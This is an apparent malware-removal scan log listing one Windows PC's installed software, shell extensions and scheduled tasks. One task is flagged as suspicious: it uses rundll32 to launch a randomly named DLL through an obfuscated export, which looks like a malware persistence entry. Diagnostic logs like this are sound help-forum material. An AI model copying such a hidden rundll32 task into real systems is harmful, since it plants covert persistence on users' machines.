Exilebuddy (HKLM-x32\...\{9D8CA614-2A7D-43B2-A59E-E16BC61C8AB0}) (Version: 0.2.4928.271 - Bossland GmbH) Hidden
GitHub (HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\5f7eb300e2ea4ebf) (Version: 3.3.4.0 - GitHub, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 62.0.3202.94 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Honorbuddy (HKLM-x32\...\{6D8FB164-2A7D-43B2-A59E-E16BF56C8AB0}) (Version: 3.0.17441.887 - Bossland GmbH) Hidden
Honorbuddy (HKLM-x32\...\{ef04a8e2-b971-4fe9-875b-a35cc6b998d7}) (Version: 3.0.17441.887 - Bossland GmbH)
IIS 10.0 Express (HKLM\...\{13FD7E30-D2F1-498D-ABC2-A4242DB6610E}) (Version: 10.0.1736 - Microsoft Corporation)
IIS Express Application Compatibility Database for x64 (HKLM\...\{08274920-8908-45c2-9258-8ad67ff77b09}.sdb) (Version:  - )
IIS Express Application Compatibility Database for x86 (HKLM\...\{ad846bae-d44b-4722-abad-f7420e08bcd9}.sdb) (Version:  - )
Java 8 Update 151 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180151F0}) (Version: 8.0.1510.12 - Oracle Corporation)
Microsoft .NET Framework 4.5 Multi-Targeting Pack (HKLM-x32\...\{56E962F0-4FB0-3C67-88DB-9EAA6EEFC493}) (Version: 4.5.50710 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (ENU) (HKLM-x32\...\{D3517C62-68A5-37CF-92F7-93C029A89681}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (HKLM-x32\...\{6A0C6700-EA93-372C-8871-DCCF13D160A4}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 SDK (HKLM-x32\...\{19A5926D-66E1-46FC-854D-163AA10A52D3}) (Version: 4.5.51641 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (ENU) (HKLM-x32\...\{290FC320-2F5A-329E-8840-C4193BD7A9EE}) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (HKLM-x32\...\{19E8AE59-4D4A-3534-B567-6CC08FA4102E}) (Version: 4.5.51651 - Microsoft Corporation)
Microsoft .NET Framework 4.6 SDK (HKLM-x32\...\{B5915D37-0637-4A26-A3AA-C5DC9F856370}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (ENU) (HKLM-x32\...\{034547E9-D8FA-49E7-8B9C-4C9861FB9146}) (Version: 4.6.00127 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (HKLM-x32\...\{2CC6A4A7-AAC2-46C9-9DBB-3727B5954F65}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 SDK (HKLM-x32\...\{2F0ECC80-B9E4-4485-8083-CD32F22ABD92}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (ENU) (HKLM-x32\...\{8EEB28EE-5141-411C-9CF0-9952264FE4AF}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (HKLM-x32\...\{8BC3EEC9-090F-4C53-A8DA-1BEC913040F9}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Version Manager (x64) 1.0.0-beta5 (HKLM\...\{c5a4aba3-1aba-3ef8-b2d5-c3fa37f59738}) (Version: 1.0.10609.0 - Microsoft Corporation)
Microsoft Help Viewer 2.2 (HKLM-x32\...\Microsoft Help Viewer 2.2) (Version: 2.2.25420 - Microsoft Corporation)
Microsoft Office Excel Viewer (HKLM-x32\...\{95120000-003F-0409-0000-0000000FF1CE}) (Version: 12.0.6219.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\OneDriveSetup.exe) (Version: 17.3.7076.1026 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20513.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Command Line Utilities  (HKLM\...\{9D573E71-1077-4C7E-B4DB-4E22A5D2B48B}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client  (HKLM\...\{49D665A2-4C2A-476E-9AB8-FCC425F526FC}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects  (HKLM-x32\...\{2774595F-BC2A-4B12-A25B-0C37A37049B0}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects  (x64) (HKLM\...\{1F9EB3B6-AED7-4AA7-B8F1-8E314B74B2A5}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Transact-SQL ScriptDom  (HKLM\...\{020CDFE0-C127-4047-B571-37C82396B662}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 T-SQL Language Service  (HKLM-x32\...\{47D08E7A-92A1-489B-B0BF-415516497BCE}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2016 LocalDB  (HKLM\...\{E359515A-92E6-4FA3-A2C9-E1BA02D8DE6E}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 Management Objects  (HKLM-x32\...\{0F1C8E2F-199A-4946-B3BF-0906DACFD032}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 Management Objects  (x64) (HKLM\...\{20EA85AA-2A1D-4F11-B09F-4BA2BF3C8989}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 T-SQL Language Service  (HKLM-x32\...\{8BFDE775-C5B8-46DB-84EF-43FFC8A2E8AD}) (Version: 13.0.14500.10 - Microsoft Corporation)
Microsoft SQL Server 2016 T-SQL ScriptDom  (HKLM\...\{D091DE8C-EA0F-49AF-8DE3-BD6C79737C6E}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server Compact 4.0 SP1 x64 ENU (HKLM\...\{78909610-D229-459C-A936-25D92283D3FD}) (Version: 4.0.8876.1 - Microsoft Corporation)
Microsoft SQL Server Data Tools - enu (14.0.60519.0) (HKLM-x32\...\{4E27B0EF-7BAB-432A-AF3D-3FC8F3F7353F}) (Version: 14.0.60519.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM\...\{FC3BB979-AA54-4B60-BBA3-2C4DA6E08D80}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM-x32\...\{091CE6AA-2753-4F6E-AD1C-0E875744EB54}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2016 (HKLM\...\{96EB5054-C775-4BEF-B7B9-AA96A295EDCD}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2016 (HKLM-x32\...\{84C23ECA-FE4D-494F-9247-3EBAD57E7F0C}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual Studio Community 2015 with Updates (HKLM-x32\...\{79b486b9-c5f0-4096-a00c-8351f59587c2}) (Version: 14.0.25420.1 - Microsoft Corporation)
Microsoft Web Deploy 3.6 (HKLM\...\{94E1227C-08A9-4962-B388-1F05D89AEA75}) (Version: 3.1238.1962 - Microsoft Corporation)
Mozilla Firefox 57.0 (x64 en-US) (HKLM\...\Mozilla Firefox 57.0 (x64 en-US)) (Version: 57.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 57.0 - Mozilla)
MSBuild/NuGet Integration 14.0 (x86) (HKLM-x32\...\{128C1654-3B9E-4959-8BFB-CE6F09C0A01D}) (Version: 14.0.25420 - Microsoft Corporation) Hidden
MU LEGEND GLOBAL (HKLM-x32\...\{MU2GB92C-VH2O-Z2AQ-N26J-M2VJEWJEUE52}_is1) (Version: 1.0.0.0 - Webzen)
Multi-Device Hybrid Apps using C# - Templates - ENU (HKLM-x32\...\{12D99739-FFD3-3761-8AA6-F929E0FE407E}) (Version: 14.0.23107 - Microsoft Corporation) Hidden
NaturalReader 14 Free (HKLM-x32\...\{773ED0E5-538E-4E86-8E00-719630613290}) (Version: 1.00.0000 - Naturalsoft)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.1 - Notepad++ Team)
NVIDIA 3D Vision Controller Driver 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 388.13 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 388.13 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.10.0.95 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.10.0.95 - NVIDIA Corporation)
NVIDIA Graphics Driver 388.13 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 388.13 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.35.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.35.1 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
Path of Exile (HKLM-x32\...\{89c396e9-fa65-4c5a-8e98-3ba1801b209d}) (Version: 2.6.0.7280 - Grinding Gear Games)
Path of Exile (HKLM-x32\...\{90A4562F-D4A1-4B65-906D-41F236CF6902}) (Version: 2.6.0.7280 - Grinding Gear Games) Hidden
PreEmptive Analytics Visual Studio Components (HKLM-x32\...\{436A18DD-5F2C-4B3C-985E-AD3C13B0CC25}) (Version: 1.2.5134.1 - PreEmptive Solutions) Hidden
Prerequisites for SSDT  (HKLM-x32\...\{21373064-AD95-48DB-A32E-0D9E08EF7355}) (Version: 12.0.2000.8 - Microsoft Corporation)
Prerequisites for SSDT  (HKLM-x32\...\{B7E94916-7AE6-4F7F-A377-7A410A42BA19}) (Version: 13.0.1601.5 - Microsoft Corporation)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.3.723.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7640 - Realtek Semiconductor Corp.)
Revo Uninstaller 2.0.4 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.4 - VS Revo Group, Ltd.)
RogueKiller version 12.11.25.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 12.11.25.0 - Adlice Software)
Roslyn Language Services - x86 (HKLM-x32\...\{6970C7E1-F99D-388D-8903-DF8FCE677FED}) (Version: 14.0.25431 - Microsoft Corporation) Hidden
Roslyn Language Services - x86 (HKLM-x32\...\{6C1985E7-E1C5-3A95-86EF-2C62465F15C3}) (Version: 14.0.23107 - Microsoft Corporation) Hidden
RuneMate (HKLM-x32\...\5153-2584-1271-2038) (Version: 2.74.0.0 - Team RuneMate)
RuneScape Launcher 1.2.7 (HKLM-x32\...\{FA52A2D0-298E-4D40-8BB7-39928627EA6A}) (Version: 1.2.7 - Jagex Ltd)
RuneScape Launcher 2.2.4 (HKLM\...\RuneScape Launcher_is1) (Version: 2.2.4 - Jagex Ltd)
SlimDX Runtime .NET 4.0 x86 (January 2012) (HKLM-x32\...\{7EBD0E43-6AC0-4CA8-9990-00E50069AD29}) (Version: 2.0.13.43 - SlimDX Group)
Spotify (HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Spotify) (Version: 1.0.67.582.g19436fa3 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Team Explorer for Microsoft Visual Studio 2015 Update 3.1 (HKLM-x32\...\{7A95671A-759E-3B83-B763-4289D1D24D73}) (Version: 14.102.25619 - Microsoft) Hidden
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.1.4 - TeamSpeak Systems GmbH)
Test Tools for Microsoft Visual Studio 2015 (HKLM-x32\...\{9EABBFE1-7EED-47D9-8FB8-21D7E4808057}) (Version: 14.0.23107 - Microsoft Corporation) Hidden
TortoiseSVN 1.9.4.27285 (64 bit) (HKLM\...\{62C19AB2-8485-4E18-A9D3-EFA612B8AE74}) (Version: 1.9.27285 - TortoiseSVN)
Twitch (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Twitch Interactive, Inc.)
TypeScript Power Tool (HKLM-x32\...\{465ACA24-B8D6-4FEC-A42D-9EFCB92CD560}) (Version: 1.8.34.0 - Microsoft Corporation) Hidden
TypeScript Tools for Microsoft Visual Studio 2015 (HKLM-x32\...\{BA5762C7-D35F-4725-A4BD-525854127018}) (Version: 1.8.36.0 - Microsoft Corporation) Hidden
Update for  (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Visual Studio 2015 Update 3 (KB3022398) (HKLM-x32\...\{7a68448b-9cf2-4049-bd73-5875f1aa7ba2}) (Version: 14.0.25420 - Microsoft Corporation)
VS Update core components (HKLM-x32\...\{B2918D01-1D89-34D3-87EF-A28121BC6EB7}) (Version: 14.0.25431 - Microsoft Corporation) Hidden
vs_update3notification (HKLM-x32\...\{AB3DF932-C990-34D4-BF43-970F760DA3CD}) (Version: 14.0.25431 - Microsoft Corporation) Hidden
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
WCF Data Services 5.6.4 Runtime (HKLM-x32\...\{DB85E7BD-B2DD-43D4-B3C0-23D7B527B597}) (Version: 5.6.62175.4 - Microsoft Corporation) Hidden
WCF Data Services Tools for Microsoft Visual Studio 2015 (HKLM-x32\...\{0A3B508E-5638-4471-BCC9-954E1868CB86}) (Version: 5.6.62175.4 - Microsoft Corporation) Hidden
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
Windows Driver Package - Sony Computer Entertainment Inc. Wireless controller for PLAYSTATION®3 Driver Package (01/20/2012 1.4.0.0) (HKLM\...\D5410AE5FA467EF0F19558D5F60C991A79E11B51) (Version: 01/20/2012 1.4.0.0 - Sony Computer Entertainment Inc.)
WinRAR 5.40 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
ShellIconOverlayIdentifiers: [  Tortoise1Normal] -> {C5994560-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [  Tortoise2Modified] -> {C5994561-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [  Tortoise3Conflict] -> {C5994562-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [  Tortoise4Locked] -> {C5994563-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [  Tortoise5ReadOnly] -> {C5994564-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [  Tortoise6Deleted] -> {C5994565-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [  Tortoise7Added] -> {C5994566-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [  Tortoise8Ignored] -> {C5994567-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [  Tortoise9Unversioned] -> {C5994568-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [  Tortoise1Normal] -> {C5994560-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [  Tortoise2Modified] -> {C5994561-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [  Tortoise3Conflict] -> {C5994562-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [  Tortoise4Locked] -> {C5994563-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [  Tortoise5ReadOnly] -> {C5994564-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [  Tortoise6Deleted] -> {C5994565-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [  Tortoise7Added] -> {C5994566-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [  Tortoise8Ignored] -> {C5994567-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [  Tortoise9Unversioned] -> {C5994568-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2016-11-27] ()
ContextMenuHandlers1: [TortoiseSVN] -> {30351349-7B7D-4FCC-81B4-1E394CA267EB} => C:\Program Files\TortoiseSVN\bin\TortoiseStub.dll [2016-04-24] (hxxp://tortoisesvn.net)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers2: [TortoiseSVN] -> {30351349-7B7D-4FCC-81B4-1E394CA267EB} => C:\Program Files\TortoiseSVN\bin\TortoiseStub.dll [2016-04-24] (hxxp://tortoisesvn.net)
ContextMenuHandlers4: [TortoiseSVN] -> {30351349-7B7D-4FCC-81B4-1E394CA267EB} => C:\Program Files\TortoiseSVN\bin\TortoiseStub.dll [2016-04-24] (hxxp://tortoisesvn.net)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-10-27] (NVIDIA Corporation)
ContextMenuHandlers5: [TortoiseSVN] -> {30351349-7B7D-4FCC-81B4-1E394CA267EB} => C:\Program Files\TortoiseSVN\bin\TortoiseStub.dll [2016-04-24] (hxxp://tortoisesvn.net)
ContextMenuHandlers6: [TortoiseSVN] -> {30351349-7B7D-4FCC-81B4-1E394CA267EB} => C:\Program Files\TortoiseSVN\bin\TortoiseStub.dll [2016-04-24] (hxxp://tortoisesvn.net)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-08-14] (Alexander Roshal)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {076BC339-BC85-403B-95C7-69876BA51B1A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-07] (Google Inc.)
Task: {4B31A75B-7D44-4F0C-A6A1-590301A96911} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-10-10] (NVIDIA Corporation)
Task: {524CDDAD-0555-4C55-9A9C-48B9E1C3F637} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-10-10] (NVIDIA Corporation)
Task: {57150746-8FA2-4723-99AB-36FBBFACA96C} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-10-10] (NVIDIA Corporation)
Task: {59696C24-2DEA-4C0C-B14B-BC31F35F0CB5} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_27_0_0_187_pepper.exe [2017-11-14] (Adobe Systems Incorporated)
Task: {6DE67E11-CB11-4717-9B3B-73CB8A3A7D75} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-04-10] (Piriform Ltd)
Task: {846E8134-C0E0-4B18-AACD-E14F899B8AF3} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-10-10] (NVIDIA Corporation)
Task: {8AE9CBEE-77EE-45AE-B980-A68EF2B5F072} - System32\Tasks\Yaminguict Explorer for ERC => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\Yaminguict Explorer for ERC\Yaminguict Explorer for ERC.dll",eWMujhpWxRLj <==== ATTENTION
Task: {98224195-71D3-447E-91DC-7F6F27DF300D} - System32\Tasks\Microsoft\VisualStudio\VSIX Auto Update 14 => C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\VSIXAutoUpdate.exe [2016-06-20] (Microsoft Corporation)
Task: {9CB2B651-76EE-4B7E-B959-ECBEC35184F5} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-10-10] (NVIDIA Corporation)
Task: {A5C38955-3E49-4B8A-8485-4930A82542F6} - System32\Tasks\Shutdown => C:\Windows\System32\shutdown.exe [2017-03-18] (Microsoft Corporation)
Task: {BF563365-7221-44D8-ADFD-B9C0F3D91610} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-10-10] (NVIDIA Corporation)
Task: {C0C81543-CAB6-4BD6-896A-4E5A40BBAF1E} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-10-10] (NVIDIA Corporation)
Task: {DAE8A708-6D46-403F-A001-F1EA529A74D2} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWoW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-11-14] (Adobe Systems Incorporated)
Task: {EFC5AC87-EA1A-4793-9C76-FD3F841A305B} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-10-10] (NVIDIA Corporation)
Task: {F092AFF2-F08D-4AF4-9B0D-749FAB094EF1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-07] (Google Inc.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
